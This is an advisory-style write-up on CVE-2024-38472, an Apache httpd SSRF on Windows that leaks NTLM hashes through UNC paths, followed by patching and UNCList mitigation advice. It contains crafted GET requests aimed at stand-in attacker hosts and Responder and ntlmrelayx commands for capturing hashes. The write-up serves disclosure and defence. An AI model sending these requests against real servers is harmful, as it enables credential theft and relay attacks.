CVE-2024-38472 - SSRF in Apache HTTP Server (Windows) Leaking NTLM Hashes — Exploit Details and Mitigation Guide

A new vulnerability, CVE-2024-38472, was discovered in the Apache HTTP Server (httpd) for Windows. This is a Server-Side Request Forgery (SSRF) flaw that can lead to leakage of Windows NTLM hashes when the server is tricked into accessing malicious UNC paths. Attackers can exploit this to capture sensitive authentication data, potentially leading to further compromise of the system or the network.

Below, we break down the vulnerability, show how the exploit works, and guide you on how to stay safe.

What is CVE-2024-38472?

CVE-2024-38472 affects the Windows version of Apache HTTP Server. If the server processes requests or configurations that refer to UNC paths (like \\host\share\file), a malicious actor can trick the server into connecting to an attacker-controlled host. This connection triggers Windows authentication, resulting in the leakage of NTLM hashes.

This is a classic SSRF (Server-Side Request Forgery) issue, but here it is dangerous because it automates NTLM authentication over a forced SMB connection, leaking password hash material that attackers can use for relay or offline cracking attacks.

References:

- Apache Security Advisory 20240612
- CVE Details — CVE-2024-38472
- Quick summary at oss-security mailing list

How Does the Exploit Work?

When you configure Apache on Windows to serve files from a UNC path, or if your application handles untrusted inputs that can specify file paths, an attacker may cause the server to access a resource like:

\\attacker-host\share\malicious.file

Here’s the problem:
Windows will attempt to authenticate with the target SMB server (the attacker's host) using NTLM, giving up a hash.

`

GET /fetch?file=\\attacker-server\share\file.txt

The server, running as SYSTEM or a service account, tries to read that file.

3. Windows will negotiate SMB authentication with the attacker's server and send NTLM authentication tokens.

Vulnerable Apache Configuration

Alias /uploads/ "\\SERVER\share\uploads\"
<Directory "\\SERVER\share\uploads\">
    Options Indexes
    AllowOverride None
    Require all granted
</Directory>

If a user can manipulate the path (e.g., via rewritten URLs or application logic), an attacker might trick Apache into reading from:

/uploads/\\attacker.com\share\evil.txt

On attacker.com, use Responder

sudo responder -I eth

Or, use Impacket's ntlmrelayx.py:

python3 ntlmrelayx.py -smb2support

Here’s a crafted HTTP request

GET /fetch?file=\\attacker.com\share\bait.txt HTTP/1.1
Host: victimserver

When Apache tries to access this file, it reaches out directly to the attacker’s SMB listener.

1. Upgrade

Patch immediately!
Update Apache HTTP Server to version 2.4.60 or later.

- Apache HTTP Server Downloads
- Read the official Security Advisory

2. Review UNC Path Usage

Apache 2.4.60 introduces a new directive: UNCList.
This directive must be used to explicitly allow any UNC paths you want Apache to access during requests.

Example

UNCList "\\trusted-server\share\"

Summary

- CVE-2024-38472 allows an SSRF attack against Apache HTTPd servers running on Windows, leaking NTLM password hashes to attacker-controlled SMB hosts.

More Information

- Apache HTTP Server Security Advisories
- Microsoft: Pass-the-Hash and Other Credential Theft
- OWASP SSRF Prevention Cheat Sheet


Credits:
Written exclusively for you using Apache advisories and security research (2024). Please share and update your systems.

Timeline

Published on: 07/01/2024 19:15:04 UTC
Last modified on: 07/12/2024 14:15:15 UTC